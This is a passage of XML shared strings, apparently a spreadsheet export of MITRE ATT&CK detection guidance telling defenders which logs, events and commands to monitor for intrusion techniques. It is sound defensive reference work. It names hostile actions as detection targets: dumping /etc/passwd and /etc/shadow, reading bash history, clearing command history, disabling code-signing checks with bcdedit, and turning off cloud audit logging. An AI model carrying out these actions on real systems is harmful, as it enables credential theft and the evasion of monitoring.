    <t>Monitor for changes made to DACLs and file/directory ownership. Many of the commands used to modify DACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.</t>
  </si>
  <si>
    <t>Enable the UpdateFolderPermissions action for all logon types. The mailbox audit log will forward folder permission modification events to the Unified Audit Log. Create rules to alert on ModifyFolderPermissions operations where the Anonymous or Default user is assigned permissions other than None._x000D_
_x000D_
A larger than normal volume of emails sent from an account and similar phishing emails sent from real accounts within a network may be a sign that an account was compromised and attempts to leverage access with modified email permissions is occurring.</t>
  </si>
  <si>
    <t>Monitor application logs for changes to settings and other events associated with network protocols and other services commonly abused for AiTM.(Citation: dhcp_serv_op_events)</t>
  </si>
  <si>
    <t>Monitor for third-party application logging, messaging, and/or other artifacts that may target resource intensive features of web applications to cause a denial of service (DoS). In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt. Externally monitor the availability of services that may be targeted by an Endpoint DoS.</t>
  </si>
  <si>
    <t>Monitor for third-party application logging, messaging, and/or other artifacts that may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. (Citation: Sucuri BIND9 August 2015) Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack. Externally monitor the availability of services that may be targeted by an Endpoint DoS.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for events collected that may attempt to find cloud groups and permission settings. </t>
  </si>
  <si>
    <t>Monitor for third-party application logging, messaging, and/or other artifacts that may leverage code repositories to collect valuable information. Monitor access to code repositories, especially performed by privileged users such as Active Directory Domain or Enterprise Administrators as these types of accounts should generally not be used to access code repositories. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user-based anomalies.</t>
  </si>
  <si>
    <t>Monitor for third-party application logging, messaging, and/or other artifacts that may leverage Confluence repositories to mine valuable information. Watch for access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.</t>
  </si>
  <si>
    <t>Monitor Windows logs (ex: EIDs 1341, 1342, 1020, and 1063) for changes to DHCP settings. These may also highlight DHCP issues such as when IP allocations are low or have run out.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)</t>
  </si>
  <si>
    <t>Monitor for third-party application logging, messaging, and/or other artifacts that may leverage information repositories to mine valuable information. Information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.</t>
  </si>
  <si>
    <t>Monitor debugger logs for signs of abnormal and potentially malicious activity.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for third-party application logging, messaging, and/or other artifacts that may modify visual content available internally or externally to an enterprise network. </t>
  </si>
  <si>
    <t>Configuration management databases (CMDB) and other asset management systems may help with the detection of computer systems or network devices that should not exist on a network.</t>
  </si>
  <si>
    <t xml:space="preserve">
Azure AD creates several log entries when new devices are enrolled, which can be monitored for unexpected device registrations.(Citation: AADInternals - BPRT) Additionally, joined devices can be viewed via the Azure AD portal.(Citation: Microsoft Manage Device Identities)</t>
  </si>
  <si>
    <t>Monitor for third-party application logging, messaging, and/or other artifacts provided by third-party services that may disable Windows event logging to limit data that can be leveraged for detections and audits.</t>
  </si>
  <si>
    <t>Firewalls and proxies can inspect URLs for potentially known-bad domains or parameters. They can also do reputation-based analytics on websites and their requested resources such as how old a domain is, who it's registered to, if it's on a known bad list, or how many other users have connected to it before.</t>
  </si>
  <si>
    <t>Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include &lt;code&gt;X-MS-Exchange-Organization-AutoForwarded&lt;/code&gt; set to true, &lt;code&gt;X-MailFwdBy&lt;/code&gt; and &lt;code&gt;X-Forwarded-To&lt;/code&gt;. The &lt;code&gt;forwardingSMTPAddress&lt;/code&gt; parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the &lt;code&gt;X-MS-Exchange-Organization-AutoForwarded&lt;/code&gt; header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.</t>
  </si>
  <si>
    <t>Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)
Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include X-MS-Exchange-Organization-AutoForwarded set to true, X-MailFwdBy and X-Forwarded-To. The forwardingSMTPAddress parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the X-MS-Exchange-Organization-AutoForwarded header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.</t>
  </si>
  <si>
    <t>Monitor for third-party application logging, messaging, and/or other artifacts that may use email rules to hide inbound emails in a compromised user's mailbox. Monitor email clients and applications for suspicious activity, such as missing messages or abnormal configuration and/or log entries.</t>
  </si>
  <si>
    <t>Monitor for third-party application logging, messaging, and/or other artifacts that may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt. Externally monitor the availability of services that may be targeted by an Endpoint DoS.</t>
  </si>
  <si>
    <t>Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Web Application Firewalls may detect improper inputs attempting exploitation.</t>
  </si>
  <si>
    <t>Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash.</t>
  </si>
  <si>
    <t xml:space="preserve">Exploitation for defense evasion may happen shortly after the system has been compromised to prevent detection during later actions for for additional tools that may be brought in and used. Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. </t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for third-party application logging, messaging, and/or other artifacts that may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. </t>
  </si>
  <si>
    <t>When authentication is not required to access an exposed remote service, monitor for follow-on activities such as anomalous external use of the exposed API or application.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for third-party application logging, messaging, and/or other artifacts that may attempt to hide artifacts associated with their behaviors to evade detection. </t>
  </si>
  <si>
    <t>Enable security auditing to collect logs from hybrid identity solutions. For example, monitor sign-ins to the Azure AD Application Proxy Connector, which are typically generated only when a new PTA Agent is added. (Citation: Mandiant Azure AD Backdoors) If AD FS is in use, review the logs for event ID 501, which specifies all EKU attributes on a claim, and raise alerts on any values that are not configured in your environment.(Citation: MagicWeb)</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for third-party application logging, messaging, and/or other artifacts that may deface systems internal to an organization in an attempt to intimidate or mislead users. </t>
  </si>
  <si>
    <t>Monitor email gateways usually do not scan internal email, but an organization can leverage the journaling-based solution which sends a copy of emails to a security service for offline analysis or incorporate service-integrated solutions using on-premise or API-based integrations to help detect internal spearphishing attacks.(Citation: Trend Micro When Phishing Starts from the Inside 2017)</t>
  </si>
  <si>
    <t>Monitor for third-party application logging, messaging, and/or other artifacts that may rely on a user running a malicious image to facilitate execution.</t>
  </si>
  <si>
    <t>Enable security auditing to collect logs from hybrid identity solutions. For example, monitor sign-ins to the Azure AD Application Proxy Connector, which are typically generated only when a new Pass Through Authentication (PTA) Agent is added. (Citation: Mandiant Azure AD Backdoors) If AD FS is in use, review the logs for event ID 501, which specifies all EKU attributes on a claim, and raise alerts on any values that are not configured in your environment.(Citation: MagicWeb)</t>
  </si>
  <si>
    <t>Monitor application logs for suspicious events including repeated MFA failures that may indicate user's primary credentials have been compromised.</t>
  </si>
  <si>
    <t>Monitor for third-party application logging, messaging, and/or other artifacts that may leverage Microsoft Office-based applications for persistence between startups. SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)</t>
  </si>
  <si>
    <t xml:space="preserve"> Monitor for third-party application logging, messaging, and/or other artifacts that may abuse Microsoft Outlook forms to obtain persistence on a compromised system. SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)</t>
  </si>
  <si>
    <t>Monitor for third-party application logging, messaging, and/or other artifacts that may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)</t>
  </si>
  <si>
    <t>Monitor for third-party application logging, messaging, and/or other artifacts that may abuse Microsoft Outlook rules to obtain persistence on a compromised system. SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)</t>
  </si>
  <si>
    <t>Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network. Consider focusing efforts on detecting other adversary behavior used to acquire credential materials, such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).</t>
  </si>
  <si>
    <t>Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Consider the following event IDs:(Citation: Trimarc Detecting Password Spraying)
Domain Controllers: "Audit Logon" (Success &amp; Failure) for event ID 4625.
Domain Controllers: "Audit Kerberos Authentication Service" (Success &amp; Failure) for event ID 4771.
All systems: "Audit Logon" (Success &amp; Failure) for event ID 4648.</t>
  </si>
  <si>
    <t>Monitor for logging, messaging, and other artifacts provided by cloud services.</t>
  </si>
  <si>
    <t>Monitor for third-party application logging, messaging, and/or other artifacts that may send phishing messages to gain access to victim systems. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.</t>
  </si>
  <si>
    <t>Depending on the specific method of phishing, the detections can vary. Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
When it comes to following links, monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites.
Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).</t>
  </si>
  <si>
    <t>Monitor for third-party application logging, messaging, and/or other artifacts that may abuse SQL stored procedures to establish persistent access to systems. On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation: NetSPI Startup Stored Procedures) Consider enabling audit features that can log malicious startup activities.</t>
  </si>
  <si>
    <t>Monitor for third-party application logging, messaging, and/or other artifacts that may abuse legitimate extensible development features of servers to establish persistent access to systems. Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells)</t>
  </si>
  <si>
    <t>Monitor logs generated by serverless execution for unusual activity. For example, in Exchange environments emails sent by Power Automate via the Outlook 365 connector include the phrase ‘Power App’ or ‘Power Automate’ in the SMTP header 'x-ms-mail-application.'(Citation: Power Automate Email Exfiltration Controls)</t>
  </si>
  <si>
    <t>Monitor for third-party application logging, messaging, and/or other artifacts that may target the different network services provided by systems to conduct a DoS. In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt. Externally monitor the availability of services that may be targeted by an Endpoint DoS.</t>
  </si>
  <si>
    <t>Monitor for third-party application logging, messaging, and/or other artifacts that may leverage the SharePoint repository as a source to mine valuable information. Monitor access to Microsoft SharePoint repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.</t>
  </si>
  <si>
    <t>Often these third-party applications will have logs of their own that can be collected and correlated with other data from the environment. Ensure that third-party application logs are on-boarded to the enterprise logging system and the logs are regularly reviewed. Audit software deployment logs and look for suspicious or unauthorized activity. A system not typically used to push software to clients that suddenly is used for such a task outside of a known admin function may be suspicious. Monitor account login activity on these applications to detect suspicious/abnormal usage._x000D_
Perform application deployment at regular times so that irregular deployment activity stands out.</t>
  </si>
  <si>
    <t>Monitor for third-party application logging, messaging, and/or other artifacts that may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) Anti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Monitor for suspicious descendant process spawning from Microsoft Office and other productivity software.(Citation: Elastic - Koadiac Detection with EQL)</t>
  </si>
  <si>
    <t>Monitor for third-party application logging, messaging, and/or other artifacts that may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.
Furthermore, monitor browser logs for homographs in ASCII and in internationalized domain names abusing different character sets (e.g. Cyrillic vs Latin versions of trusted sites).</t>
  </si>
  <si>
    <t>Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) Monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites.
Furthermore, monitor browser logs for homographs in ASCII and in internationalized domain names abusing different character sets (e.g. Cyrillic vs Latin versions of trusted sites).</t>
  </si>
  <si>
    <t>Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).
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 xml:space="preserve">Monitor for third-party application logging, messaging, and/or other artifacts that may send spearphishing messages via third-party services in an attempt to gain access to victim systems. </t>
  </si>
  <si>
    <t>Ensure CA audit logs are enabled and monitor these services for signs of abuse.(Citation: SpecterOps Certified Pre Owned)</t>
  </si>
  <si>
    <t>Monitor for third-party application logging, messaging, and/or other artifacts that may abuse Microsoft transport agents to establish persistent access to systems. Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components.</t>
  </si>
  <si>
    <t>Configuration management databases (CMDB) and other asset management systems may help with the detection of computer systems or network devices that should not exist on a network. Monitor logs for unexpected actions taken by any delegated administrator accounts.(Citation: Microsoft Nobelium Admin Privileges)</t>
  </si>
  <si>
    <t>Monitor for third-party application logging, messaging, and/or other artifacts that may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls.</t>
  </si>
  <si>
    <t>Monitor for third-party application logging, messaging, and/or other artifacts that may rely upon specific actions by a user in order to gain execution.</t>
  </si>
  <si>
    <t>Monitor for third-party application logging, messaging, and/or other service artifacts that provide context of user authentication to web applications, including cloud-based services. Combine this information with web credentials usage events to identify authentication events that do not fit the organization baseline.</t>
  </si>
  <si>
    <t>Monitor for third-party application logging, messaging, and/or other artifacts that may backdoor web servers with web shells to establish persistent access to systems. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells)</t>
  </si>
  <si>
    <t>Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)</t>
  </si>
  <si>
    <t>Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.</t>
  </si>
  <si>
    <t>Monitor logs for API calls to disable logging. In AWS, monitor for: &lt;code&gt;StopLogging&lt;/code&gt; and &lt;code&gt;DeleteTrail&lt;/code&gt;.(Citation: Stopping CloudTrail from Sending Events to CloudWatch Logs) In GCP, monitor for: &lt;code&gt;google.logging.v2.ConfigServiceV2.UpdateSink&lt;/code&gt;.(Citation: Configuring Data Access audit logs) In Azure, monitor for &lt;code&gt;az monitor diagnostic-settings delete&lt;/code&gt;.(Citation: az monitor diagnostic-settings) Additionally, a sudden loss of a log source may indicate that it has been disabled.</t>
  </si>
  <si>
    <t>Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
Normal, benign system and network events that look like cloud service discovery may be uncommon, depending on the environment and how they are used. Monitor cloud service usage for anomalous behavior that may indicate adversarial presence within the environment.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor changes made to cloud services for unexpected modifications to settings and/or data </t>
  </si>
  <si>
    <t>Monitor the creation and modification of cloud resources that may be abused for persistence, such as functions and workflows monitoring cloud events.</t>
  </si>
  <si>
    <t>Monitor changes made to cloud services for unexpected modifications to settings and/or data.</t>
  </si>
  <si>
    <t>Monitor the creation and modification of serverless resources such as functions and workflows.</t>
  </si>
  <si>
    <t>Monitor for unusual queries to the cloud provider's storage service. Activity originating from unexpected sources may indicate improper permissions are set and are allowing access to data. Additionally, detecting failed attempts by a user for a certain object, followed by escalation of privileges by the same user, and access to the same object may be an indication of suspicious activity.</t>
  </si>
  <si>
    <t>Monitor account activity for attempts to create and share data, such as snapshots or backups, with untrusted or unusual accounts.</t>
  </si>
  <si>
    <t>Monitor for unexpected deletion of a cloud storage infrastructure, such as the &lt;code&gt;DeleteDBCluster&lt;/code&gt; and &lt;code&gt;DeleteGlobalCluster&lt;/code&gt; events in AWS, or a high quantity of data deletion events, such as &lt;code&gt;DeleteBucket&lt;/code&gt;. Many of these events within a short period of time may indicate malicious activity.</t>
  </si>
  <si>
    <t>Monitor cloud logs for API calls and other potentially unusual activity related to cloud data object storage enumeration. Discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.</t>
  </si>
  <si>
    <t>Monitor cloud logs for API calls used for file or object enumeration for unusual activity. System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.</t>
  </si>
  <si>
    <t>Periodically baseline cloud storage infrastructure to identify malicious modifications or additions.</t>
  </si>
  <si>
    <t>Monitor for changes made in cloud environments for events that indicate storage objects have been anomalously modified.</t>
  </si>
  <si>
    <t>Monitor for anomalous file transfer activity between accounts and/or to untrusted/unexpected VPCs.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to dump the contents of &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt; to enable offline password cracking.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for token manipulation by auditing command-line activity. Specifically, analysts should look for use of the &lt;code&gt;runas&lt;/code&gt; command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Command line invocation of tools capable of modifying the Registry for associated keys are also suspicious. Utility arguments and the binaries themselves should be monitored for changes.</t>
  </si>
  <si>
    <t>Monitor logs and other sources of command execution history for actions that could be taken to gather information about accounts, including the use of calls to cloud APIs that perform account discovery.
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for suspicious commands to modify accounts or account settings (including files such as the `authorized_keys` or `/etc/ssh/sshd_config`).
Monitor executed commands and arguments of suspicious commands (such as `Add-MailboxPermission`) that may be indicative of modifying the permissions of Exchange and other related service settings.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may achieve persistence by adding a Registry key to the Active Setup of the local machine.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor executed commands and arguments that may abuse Microsoft Office add-ins to obtain persistence on a compromised system. </t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may abuse AppleScript for execution. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used.  Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for sdbinst.exe for potential indications of application shim abuse.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that could be taken to gather system and network information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor executed commands and arguments for actions that will aid in compression or encrypting data that is collected prior to exfiltration, such as tar. </t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that could be taken to create/modify tasks. Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that can leverage a computer’s peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may abuse authentication packages to execute DLLs when the system boots.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that could be taken to collect internal data.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments from the BITSAdmin tool (especially the ‘Transfer’, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options)(Citation: Microsoft BITS) Admin logs, PowerShell logs, and the Windows Event log for BITS activity.(Citation: Elastic - Hunting for Persistence Part 1) Also consider investigating more detailed information about jobs by parsing the BITS job database.(Citation: CTU BITS Malware June 2016)</t>
  </si>
  <si>
    <t>While users do typically rely on their history of commands, they often access this history through other utilities like "history" instead of commands like &lt;code&gt;cat ~/.bash_history&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may consist of logon scripts for unusual access by abnormal users or at abnormal times.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that could be taken to gather browser bookmark information. Remote access tools with built-in features may interact directly using APIs to gather information. Information may also be acquired through system management tools such as Windows Management Instrumentation and PowerShell.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for usage of the profiles tool, such as profiles install -type=configuration.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may bypass UAC mechanisms to elevate process privileges on system.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may gather information about the victim's hosts that can be used during targeting.</t>
  </si>
  <si>
    <t>Extra scrutiny should be placed on suspicious modification of Registry keys such as COR_ENABLE_PROFILING, COR_PROFILER, and COR_PROFILER_PATH by command line tools like wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075). Monitoring for command-line arguments indicating a change to COR_PROFILER variables may aid in detection.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds). Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may establish persistence by executing malicious content triggered by a file type association.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that could be taken to clear command history, such as &lt;code&gt;Clear-History&lt;/code&gt; on Windows or `clear logging` / `clear history` via a Network Device CLI in AAA logs, or to disable writing command history, such as &lt;code&gt;history -c&lt;/code&gt; in bash/zsh, .</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that could be taken to remove or overwrite system logs.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor executed commands and arguments that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined emails. </t>
  </si>
  <si>
    <t xml:space="preserve">Monitor executed commands and arguments that may delete or alter malicious network configuration settings as well as generated artifacts on a host system, including logs and files such as &lt;code&gt;Default.rdp&lt;/code&gt; or &lt;code&gt;/var/log/&lt;/code&gt;. </t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may delete or alter generated artifacts associated with persistence on a host system.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that would delete Windows event logs (via PowerShell)</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments to collect data stored in the clipboard from users copying information within or between applications.</t>
  </si>
  <si>
    <t>Monitor logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for executed commands and arguments that may attempt to find cloud groups and permission settings. </t>
  </si>
  <si>
    <t>Monitor for the execution of commands that could modify the code signing policy of a system, such as &lt;code&gt;bcdedit.exe -set TESTSIGNING ON&lt;/code&gt;. (Citation: Microsoft TESTSIGNING Feb 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. </t>
  </si>
  <si>
